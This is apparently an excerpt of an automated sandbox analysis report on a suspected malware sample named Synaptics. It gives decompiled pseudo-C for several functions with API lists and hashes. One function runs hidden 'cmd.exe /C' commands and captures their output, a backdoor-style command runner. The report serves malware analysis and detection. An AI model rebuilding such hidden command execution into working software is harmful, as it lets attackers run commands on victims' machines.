                                                                                                                                                                                                                            								if(_t278 < 0) {
                                                                                                                                                                                                                            									_t278 = 0;
                                                                                                                                                                                                                            									__eflags = 0;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_t328 = _t278;
                                                                                                                                                                                                                            								 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                                                                                                                                                                                                            								_t281 = _v8;
                                                                                                                                                                                                                            								__eflags =  *((char*)(_t281 + 0x57));
                                                                                                                                                                                                                            								if( *((char*)(_t281 + 0x57)) != 0) {
                                                                                                                                                                                                                            									E00454DB8(_v8, _t328);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						 *((char*)(_v8 + 0x230)) = 0;
                                                                                                                                                                                                                            						if( *((char*)(_v8 + 0x22f)) != 1) {
                                                                                                                                                                                                                            							ShowWindow(E00441704(_v8),  *(0x49bee0 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							if( *(_v8 + 0x22b) != 2) {
                                                                                                                                                                                                                            								ShowWindow(E00441704(_v8),  *(0x49bee0 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
                                                                                                                                                                                                                            								_t220 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
                                                                                                                                                                                                                            								__eflags = _t220;
                                                                                                                                                                                                                            								CallWindowProcA(0x407538, E00441704(_v8), 5, 0, _t220);
                                                                                                                                                                                                                            								E0043B1DC();
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t231 = E00441704(_v8);
                                                                                                                                                                                                                            								_t232 =  *0x49ebb8; // 0x21e1714
                                                                                                                                                                                                                            								_t105 = _t232 + 0x44; // 0x21e2354
                                                                                                                                                                                                                            								_t106 =  *_t105 + 0x254; // 0x0
                                                                                                                                                                                                                            								SendMessageA( *_t106, 0x223, _t231, 0);
                                                                                                                                                                                                                            								ShowWindow(E00441704(_v8), 3);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t226 =  *0x49ebb8; // 0x21e1714
                                                                                                                                                                                                                            							_t119 = _t226 + 0x44; // 0x21e2354
                                                                                                                                                                                                                            							_t120 =  *_t119 + 0x254; // 0x0
                                                                                                                                                                                                                            							SendMessageA( *_t120, 0x234, 0, 0);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t331);
                                                                                                                                                                                                                            				 *[fs:eax] = _t331;
                                                                                                                                                                                                                            				_push(0x456eb0);
                                                                                                                                                                                                                            				_t154 = _v8;
                                                                                                                                                                                                                            				 *(_t154 + 0x2f4) =  *(_t154 + 0x2f4) & 0x000000fb;
                                                                                                                                                                                                                            				return _t154;
                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                            0x00456e27
                                                                                                                                                                                                                            0x00456e2e
                                                                                                                                                                                                                            0x00456e33
                                                                                                                                                                                                                            0x00456e35
                                                                                                                                                                                                                            0x00456e40
                                                                                                                                                                                                                            0x00456e45
                                                                                                                                                                                                                            0x00456e47
                                                                                                                                                                                                                            0x00456e56
                                                                                                                                                                                                                            0x00456e56
                                                                                                                                                                                                                            0x00456e47
                                                                                                                                                                                                                            0x00456e58
                                                                                                                                                                                                                            0x00456e5a
                                                                                                                                                                                                                            0x00456e8c
                                                                                                                                                                                                                            0x00456e5c
                                                                                                                                                                                                                            0x00456e74
                                                                                                                                                                                                                            0x00456e7a
                                                                                                                                                                                                                            0x00456e7a
                                                                                                                                                                                                                            0x00456e03
                                                                                                                                                                                                                            0x00456e1b
                                                                                                                                                                                                                            0x00456e1b
                                                                                                                                                                                                                            0x00456dea
                                                                                                                                                                                                                            0x00456ded
                                                                                                                                                                                                                            0x00456ded
                                                                                                                                                                                                                            0x004569f0
                                                                                                                                                                                                                            0x004569f2
                                                                                                                                                                                                                            0x004569f3
                                                                                                                                                                                                                            0x004569f8
                                                                                                                                                                                                                            0x004569fb
                                                                                                                                                                                                                            0x00456a05
                                                                                                                                                                                                                            0x00456a0f
                                                                                                                                                                                                                            0x00456a35
                                                                                                                                                                                                                            0x00456a61
                                                                                                                                                                                                                            0x00456aaa
                                                                                                                                                                                                                            0x00456aaa
                                                                                                                                                                                                                            0x00456aad
                                                                                                                                                                                                                            0x00456aaf
                                                                                                                                                                                                                            0x00456ab1
                                                                                                                                                                                                                            0x00456ab1
                                                                                                                                                                                                                            0x00456ac1
                                                                                                                                                                                                                            0x00456ac1
                                                                                                                                                                                                                            0x00456ac4
                                                                                                                                                                                                                            0x00456ac6
                                                                                                                                                                                                                            0x00456ac8
                                                                                                                                                                                                                            0x00456ac8
                                                                                                                                                                                                                            0x00456a63
                                                                                                                                                                                                                            0x00456a63
                                                                                                                                                                                                                            0x00456a68
                                                                                                                                                                                                                            0x00456a75
                                                                                                                                                                                                                            0x00456a78
                                                                                                                                                                                                                            0x00456a7a
                                                                                                                                                                                                                            0x00456a7c
                                                                                                                                                                                                                            0x00456a7c
                                                                                                                                                                                                                            0x00456a7f
                                                                                                                                                                                                                            0x00456a84
                                                                                                                                                                                                                            0x00456a8f
                                                                                                                                                                                                                            0x00456a92
                                                                                                                                                                                                                            0x00456a94
                                                                                                                                                                                                                            0x00456a96
                                                                                                                                                                                                                            0x00456a96
                                                                                                                                                                                                                            0x00456a94
                                                                                                                                                                                                                            0x00456acd
                                                                                                                                                                                                                            0x00456acf
                                                                                                                                                                                                                            0x00456acf
                                                                                                                                                                                                                            0x00456ad3
                                                                                                                                                                                                                            0x00456ad5
                                                                                                                                                                                                                            0x00456ad5
                                                                                                                                                                                                                            0x00456ae5
                                                                                                                                                                                                                            0x00456aee
                                                                                                                                                                                                                            0x00456afb
                                                                                                                                                                                                                            0x00456b04
                                                                                                                                                                                                                            0x00456b04
                                                                                                                                                                                                                            0x00456b0e
                                                                                                                                                                                                                            0x00456b11
                                                                                                                                                                                                                            0x00456b1c
                                                                                                                                                                                                                            0x00456b1f
                                                                                                                                                                                                                            0x00456bf3
                                                                                                                                                                                                                            0x00456bf5
                                                                                                                                                                                                                            0x00456bfb
                                                                                                                                                                                                                            0x00456bfe
                                                                                                                                                                                                                            0x00456c05
                                                                                                                                                                                                                            0x00456c4e
                                                                                                                                                                                                                            0x00456c4e
                                                                                                                                                                                                                            0x00456c51
                                                                                                                                                                                                                            0x00456c53
                                                                                                                                                                                                                            0x00456c55
                                                                                                                                                                                                                            0x00456c55
                                                                                                                                                                                                                            0x00456c65
                                                                                                                                                                                                                            0x00456c65
                                                                                                                                                                                                                            0x00456c68
                                                                                                                                                                                                                            0x00456c6a
                                                                                                                                                                                                                            0x00456c6c
                                                                                                                                                                                                                            0x00456c6c
                                                                                                                                                                                                                            0x00456c07
                                                                                                                                                                                                                            0x00456c07
                                                                                                                                                                                                                            0x00456c0c
                                                                                                                                                                                                                            0x00456c19
                                                                                                                                                                                                                            0x00456c19
                                                                                                                                                                                                                            0x00456c1c
                                                                                                                                                                                                                            0x00456c1e
                                                                                                                                                                                                                            0x00456c20
                                                                                                                                                                                                                            0x00456c20
                                                                                                                                                                                                                            0x00456c23
                                                                                                                                                                                                                            0x00456c28
                                                                                                                                                                                                                            0x00456c33
                                                                                                                                                                                                                            0x00456c33
                                                                                                                                                                                                                            0x00456c36
                                                                                                                                                                                                                            0x00456c38
                                                                                                                                                                                                                            0x00456c3a
                                                                                                                                                                                                                            0x00456c3a
                                                                                                                                                                                                                            0x00456c38
                                                                                                                                                                                                                            0x00456c6f
                                                                                                                                                                                                                            0x00456c71
                                                                                                                                                                                                                            0x00456c73
                                                                                                                                                                                                                            0x00456c73
                                                                                                                                                                                                                            0x00456c73
                                                                                                                                                                                                                            0x00456c75
                                                                                                                                                                                                                            0x00456c77
                                                                                                                                                                                                                            0x00456c79
                                                                                                                                                                                                                            0x00456c79
                                                                                                                                                                                                                            0x00456c79
                                                                                                                                                                                                                            0x00456c92

APIs
• SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00456CDD
  • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
Strings
Memory Dump Source
• Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
Yara matches
Similarity
• API ID: LoadMessageSendString
• String ID: @/B
• API String ID: 1946433856-85281795
• Opcode ID: b802bc65ef57ac491deb0d99d8f24958f689bbc59b5020101f6ab40056b0baf1
• Instruction ID: 4b6bfc7c0ddb1c0560f123697eaff68a2ce520b055fb56cf76eb45ff435e8cfa
• Opcode Fuzzy Hash: b802bc65ef57ac491deb0d99d8f24958f689bbc59b5020101f6ab40056b0baf1
• Instruction Fuzzy Hash: 18F14E30A00204EFDB01DBA9C985F9E77F5AB05305F6545B6E944AB3A3D738BE44DB48
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 38%
                                                                                                                                                                                                                            			E00475384(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __esi, void* __eflags) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                            				long _v24;
                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES _v40;
                                                                                                                                                                                                                            				struct _STARTUPINFOA _v108;
                                                                                                                                                                                                                            				struct _PROCESS_INFORMATION _v124;
                                                                                                                                                                                                                            				char _v380;
                                                                                                                                                                                                                            				char _v384;
                                                                                                                                                                                                                            				char _v388;
                                                                                                                                                                                                                            				CHAR* _t77;
                                                                                                                                                                                                                            				void* _t112;
                                                                                                                                                                                                                            				intOrPtr _t125;
                                                                                                                                                                                                                            				intOrPtr _t126;
                                                                                                                                                                                                                            				void* _t131;
                                                                                                                                                                                                                            				void* _t133;
                                                                                                                                                                                                                            				void* _t134;
                                                                                                                                                                                                                            				intOrPtr _t135;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t133 = _t134;
                                                                                                                                                                                                                            				_t135 = _t134 + 0xfffffe80;
                                                                                                                                                                                                                            				_v388 = 0;
                                                                                                                                                                                                                            				_v384 = 0;
                                                                                                                                                                                                                            				_v28 = 0;
                                                                                                                                                                                                                            				_t131 = __ecx;
                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				E00404E70(_v8);
                                                                                                                                                                                                                            				E00404E70(_v12);
                                                                                                                                                                                                                            				_push(_t133);
                                                                                                                                                                                                                            				_push(0x4755bb);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t135;
                                                                                                                                                                                                                            				E004049C0(__ecx);
                                                                                                                                                                                                                            				_v40.nLength = 0xc;
                                                                                                                                                                                                                            				_v40.bInheritHandle = 0xffffffff;
                                                                                                                                                                                                                            				_v40.lpSecurityDescriptor = 0;
                                                                                                                                                                                                                            				CreatePipe( &_v16,  &_v20,  &_v40, 0);
                                                                                                                                                                                                                            				_push(_t133);
                                                                                                                                                                                                                            				_push(0x475581);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t135;
                                                                                                                                                                                                                            				E004032B4( &_v108, 0x44);
                                                                                                                                                                                                                            				_v108.cb = 0x44;
                                                                                                                                                                                                                            				_v108.dwFlags = 0x101;
                                                                                                                                                                                                                            				_v108.wShowWindow = 0;
                                                                                                                                                                                                                            				_v108.hStdInput = GetStdHandle(0xfffffff6);
                                                                                                                                                                                                                            				_v108.hStdOutput = _v20;
                                                                                                                                                                                                                            				_v108.hStdError = _v20;
                                                                                                                                                                                                                            				if(E00409A58(_v12) == 0) {
                                                                                                                                                                                                                            					E00404A58( &_v28, 0x4755d0);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					E00404A58( &_v28, _v12);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t77 = E00404E80(_v28);
                                                                                                                                                                                                                            				E00404CCC( &_v384, _v8, "cmd.exe /C ");
                                                                                                                                                                                                                            				CreateProcessA(0, E00404E80(_v384), 0, 0, 0xffffffff, 0, 0, _t77,  &_v108,  &_v124);
                                                                                                                                                                                                                            				asm("sbb ebx, ebx");
                                                                                                                                                                                                                            				_t112 = 1;
                                                                                                                                                                                                                            				CloseHandle(_v20);
                                                                                                                                                                                                                            				if(1 == 0) {
                                                                                                                                                                                                                            					_pop(_t125);
                                                                                                                                                                                                                            					 *[fs:eax] = _t125;
                                                                                                                                                                                                                            					_push(E00475588);
                                                                                                                                                                                                                            					return CloseHandle(_v16);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_push(_t133);
                                                                                                                                                                                                                            					_push(0x475563);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t135;
                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                            						ReadFile(_v16,  &_v380, 0xff,  &_v24, 0);
                                                                                                                                                                                                                            						asm("sbb ebx, ebx");
                                                                                                                                                                                                                            						_t112 = _t112 + 1;
                                                                                                                                                                                                                            						if(_v24 > 0) {
                                                                                                                                                                                                                            							 *((char*)(_t133 + _v24 - 0x178)) = 0;
                                                                                                                                                                                                                            							OemToCharA( &_v380,  &_v380);
                                                                                                                                                                                                                            							E00404C30( &_v388, 0x100,  &_v380);
                                                                                                                                                                                                                            							E00404C88(_t131, _v388);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} while (_t112 != 0 && _v24 != 0);
                                                                                                                                                                                                                            					WaitForSingleObject(_v124.hProcess, 0xffffffff);
                                                                                                                                                                                                                            					_pop(_t126);
                                                                                                                                                                                                                            					 *[fs:eax] = _t126;
                                                                                                                                                                                                                            					_push(E0047556A);
                                                                                                                                                                                                                            					CloseHandle(_v124.hThread);
                                                                                                                                                                                                                            					return CloseHandle(_v124);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}


                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,004755BB,?,00000000,021E2A8C,?,00495E40,?,021E2A8C,021E2A8C,00000000,00000000), ref: 004753EE
                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00475581,?,?,?), ref: 00475426
                                                                                                                                                                                                                              • Part of subcall function 00409A58: GetFileAttributesA.KERNEL32(00000000,00000000,00496E89,00000000,00496FE6), ref: 00409A63
                                                                                                                                                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,00475581,000000F6,00000000,00475581,?,?,?), ref: 0047549C
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,00475581,000000F6,00000000,00475581,?,?), ref: 004754AB
                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 004754DC
                                                                                                                                                                                                                            • OemToCharA.USER32(00000000,00000000), ref: 00475506
                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00475581,000000FF,?,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF), ref: 0047553E
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,0047556A,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF,00000000), ref: 00475554
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00475581,?,0047556A,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF), ref: 0047555D
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Handle$Close$CreateFile$AttributesCharObjectPipeProcessReadSingleWait
                                                                                                                                                                                                                            • String ID: C:\$D$cmd.exe /C
                                                                                                                                                                                                                            • API String ID: 3269375759-2807548070
                                                                                                                                                                                                                            • Opcode ID: 15fdb282fb5a70a6ac8dca0f18dfeb7b610c3755cc11197428ccb14af1d051a8
                                                                                                                                                                                                                            • Instruction ID: 82437ea0ccec46d2af5a08e72f5cf6232f0238eba76bb00f3cc1c06be9a4dd54
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15fdb282fb5a70a6ac8dca0f18dfeb7b610c3755cc11197428ccb14af1d051a8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E5150B1904608AFDB10EFA5C881BDEB7B8EB48314F51457AF518F72C1DB785E448B68
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                                                            			E0044EA40(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				struct HMENU__* _v12;
                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                            				char _v17;
                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                            				int _v28;
                                                                                                                                                                                                                            				struct HDC__* _v32;
                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                                                                                            				intOrPtr* _v48;
                                                                                                                                                                                                                            				char _v52;
                                                                                                                                                                                                                            				intOrPtr _t137;
                                                                                                                                                                                                                            				signed int _t138;
                                                                                                                                                                                                                            				intOrPtr _t144;
                                                                                                                                                                                                                            				signed int _t150;
                                                                                                                                                                                                                            				signed int _t151;
                                                                                                                                                                                                                            				intOrPtr* _t153;
                                                                                                                                                                                                                            				void* _t158;
                                                                                                                                                                                                                            				struct HMENU__* _t160;
                                                                                                                                                                                                                            				intOrPtr* _t165;
                                                                                                                                                                                                                            				void* _t173;
                                                                                                                                                                                                                            				signed int _t177;
                                                                                                                                                                                                                            				signed int _t181;
                                                                                                                                                                                                                            				void* _t182;
                                                                                                                                                                                                                            				void* _t214;
                                                                                                                                                                                                                            				struct HDC__* _t221;
                                                                                                                                                                                                                            				void* _t251;
                                                                                                                                                                                                                            				signed int _t257;
                                                                                                                                                                                                                            				void* _t265;
                                                                                                                                                                                                                            				signed int _t271;
                                                                                                                                                                                                                            				signed int _t272;
                                                                                                                                                                                                                            				signed int _t274;
                                                                                                                                                                                                                            				signed int _t275;
                                                                                                                                                                                                                            				signed int _t277;
                                                                                                                                                                                                                            				signed int _t278;
                                                                                                                                                                                                                            				signed int _t280;
                                                                                                                                                                                                                            				signed int _t281;
                                                                                                                                                                                                                            				signed int _t283;
                                                                                                                                                                                                                            				signed int _t284;
                                                                                                                                                                                                                            				signed int _t286;
                                                                                                                                                                                                                            				signed int _t287;
                                                                                                                                                                                                                            				signed int _t290;
                                                                                                                                                                                                                            				signed int _t291;
                                                                                                                                                                                                                            				intOrPtr _t307;
                                                                                                                                                                                                                            				intOrPtr _t311;
                                                                                                                                                                                                                            				intOrPtr _t333;
                                                                                                                                                                                                                            				intOrPtr _t342;
                                                                                                                                                                                                                            				intOrPtr _t346;
                                                                                                                                                                                                                            				intOrPtr* _t353;
                                                                                                                                                                                                                            				signed int _t355;
                                                                                                                                                                                                                            				intOrPtr* _t356;
                                                                                                                                                                                                                            				signed int _t367;
                                                                                                                                                                                                                            				signed int _t368;
                                                                                                                                                                                                                            				signed int _t369;
                                                                                                                                                                                                                            				signed int _t370;
                                                                                                                                                                                                                            				signed int _t371;
                                                                                                                                                                                                                            				signed int _t372;
                                                                                                                                                                                                                            				signed int _t373;
                                                                                                                                                                                                                            				intOrPtr* _t375;
                                                                                                                                                                                                                            				void* _t377;
                                                                                                                                                                                                                            				void* _t378;
                                                                                                                                                                                                                            				intOrPtr _t379;
                                                                                                                                                                                                                            				void* _t380;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t377 = _t378;
                                                                                                                                                                                                                            				_t379 = _t378 + 0xffffffd0;
                                                                                                                                                                                                                            				_v52 = 0;
                                                                                                                                                                                                                            				_t375 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_push(_t377);
                                                                                                                                                                                                                            				_push(0x44ef73);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t379;
                                                                                                                                                                                                                            				_t137 =  *__edx;
                                                                                                                                                                                                                            				_t380 = _t137 - 0x111;
                                                                                                                                                                                                                            				if(_t380 > 0) {
                                                                                                                                                                                                                            					_t138 = _t137 - 0x117;
                                                                                                                                                                                                                            					__eflags = _t138;
                                                                                                                                                                                                                            					if(_t138 == 0) {
                                                                                                                                                                                                                            						_t271 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                                                                                                                                                                            						__eflags = _t271;
                                                                                                                                                                                                                            						if(_t271 < 0) {
                                                                                                                                                                                                                            							goto L67;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t272 = _t271 + 1;
                                                                                                                                                                                                                            							_t367 = 0;
                                                                                                                                                                                                                            							__eflags = 0;
                                                                                                                                                                                                                            							while(1) {
                                                                                                                                                                                                                            								_t150 = E0044DDEC(E0041AC6C(_v8, _t367),  *(_t375 + 4), __eflags);
                                                                                                                                                                                                                            								__eflags = _t150;
                                                                                                                                                                                                                            								if(_t150 != 0) {
                                                                                                                                                                                                                            									goto L68;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_t367 = _t367 + 1;
                                                                                                                                                                                                                            								_t272 = _t272 - 1;
                                                                                                                                                                                                                            								__eflags = _t272;
                                                                                                                                                                                                                            								if(_t272 != 0) {
                                                                                                                                                                                                                            									continue;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									goto L67;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								goto L68;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t151 = _t138 - 8;
                                                                                                                                                                                                                            						__eflags = _t151;
                                                                                                                                                                                                                            						if(_t151 == 0) {
                                                                                                                                                                                                                            							_v17 = 0;
                                                                                                                                                                                                                            							__eflags =  *(__edx + 6) & 0x00000010;
                                                                                                                                                                                                                            							if(( *(__edx + 6) & 0x00000010) != 0) {
                                                                                                                                                                                                                            								_v17 = 1;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t274 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                                                                                                                                                                            							__eflags = _t274;
                                                                                                                                                                                                                            							if(__eflags < 0) {
                                                                                                                                                                                                                            								L32:
                                                                                                                                                                                                                            								_t153 =  *0x49dbcc; // 0x49ebb8
                                                                                                                                                                                                                            								E0045B010( *_t153, 0, __eflags);
                                                                                                                                                                                                                            								goto L67;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t275 = _t274 + 1;
                                                                                                                                                                                                                            								_t368 = 0;
                                                                                                                                                                                                                            								__eflags = 0;
                                                                                                                                                                                                                            								while(1) {
                                                                                                                                                                                                                            									__eflags = _v17 - 1;
                                                                                                                                                                                                                            									if(_v17 != 1) {
                                                                                                                                                                                                                            										_v12 =  *(_t375 + 4) & 0x0000ffff;
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										_t160 =  *(_t375 + 8);
                                                                                                                                                                                                                            										__eflags = _t160;
                                                                                                                                                                                                                            										if(_t160 == 0) {
                                                                                                                                                                                                                            											_v12 = 0xffffffff;
                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                            											_v12 = GetSubMenu(_t160,  *(_t375 + 4) & 0x0000ffff);
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									_t158 = E0041AC6C(_v8, _t368);
                                                                                                                                                                                                                            									_t295 = _v17;
                                                                                                                                                                                                                            									_v16 = E0044DD30(_t158, _v17, _v12);
                                                                                                                                                                                                                            									__eflags = _v16;
                                                                                                                                                                                                                            									if(__eflags != 0) {
                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									_t368 = _t368 + 1;
                                                                                                                                                                                                                            									_t275 = _t275 - 1;
                                                                                                                                                                                                                            									__eflags = _t275;
                                                                                                                                                                                                                            									if(__eflags != 0) {
                                                                                                                                                                                                                            										continue;
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										goto L32;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									goto L68;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								E004380E0( *((intOrPtr*)(_v16 + 0x58)), _t295,  &_v52, __eflags);
                                                                                                                                                                                                                            								_t165 =  *0x49dbcc; // 0x49ebb8
                                                                                                                                                                                                                            								E0045B010( *_t165, _v52, __eflags);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							__eflags = _t151 == 1;
                                                                                                                                                                                                                            							if(_t151 == 1) {
                                                                                                                                                                                                                            								_t277 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                                                                                                                                                                            								__eflags = _t277;
                                                                                                                                                                                                                            								if(_t277 < 0) {
                                                                                                                                                                                                                            									goto L67;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									_t278 = _t277 + 1;
                                                                                                                                                                                                                            									_t369 = 0;
                                                                                                                                                                                                                            									__eflags = 0;
                                                                                                                                                                                                                            									while(1) {
                                                                                                                                                                                                                            										_v48 = E0041AC6C(_v8, _t369);
                                                                                                                                                                                                                            										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
                                                                                                                                                                                                                            										__eflags = _t173 -  *(_t375 + 8);
                                                                                                                                                                                                                            										if(_t173 ==  *(_t375 + 8)) {
                                                                                                                                                                                                                            											break;
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										_t177 = E0044DD30(_v48, 1,  *(_t375 + 8));
                                                                                                                                                                                                                            										__eflags = _t177;
                                                                                                                                                                                                                            										if(_t177 == 0) {
                                                                                                                                                                                                                            											_t369 = _t369 + 1;
                                                                                                                                                                                                                            											_t278 = _t278 - 1;
                                                                                                                                                                                                                            											__eflags = _t278;
                                                                                                                                                                                                                            											if(_t278 != 0) {
                                                                                                                                                                                                                            												continue;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												goto L67;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                            											break;
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										goto L68;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									E0044E630(_v48, _t375);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								goto L67;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L68;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if(_t380 == 0) {
                                                                                                                                                                                                                            						_t280 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                                                                                                                                                                            						__eflags = _t280;
                                                                                                                                                                                                                            						if(_t280 < 0) {
                                                                                                                                                                                                                            							goto L67;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t281 = _t280 + 1;
                                                                                                                                                                                                                            							_t370 = 0;
                                                                                                                                                                                                                            							__eflags = 0;
                                                                                                                                                                                                                            							while(1) {
                                                                                                                                                                                                                            								E0041AC6C(_v8, _t370);
                                                                                                                                                                                                                            								_t181 = E0044DDD0( *(_t375 + 4), __eflags);
                                                                                                                                                                                                                            								__eflags = _t181;
                                                                                                                                                                                                                            								if(_t181 != 0) {
                                                                                                                                                                                                                            									goto L68;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_t370 = _t370 + 1;
                                                                                                                                                                                                                            								_t281 = _t281 - 1;
                                                                                                                                                                                                                            								__eflags = _t281;
                                                                                                                                                                                                                            								if(_t281 != 0) {
                                                                                                                                                                                                                            									continue;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									goto L67;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								goto L68;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
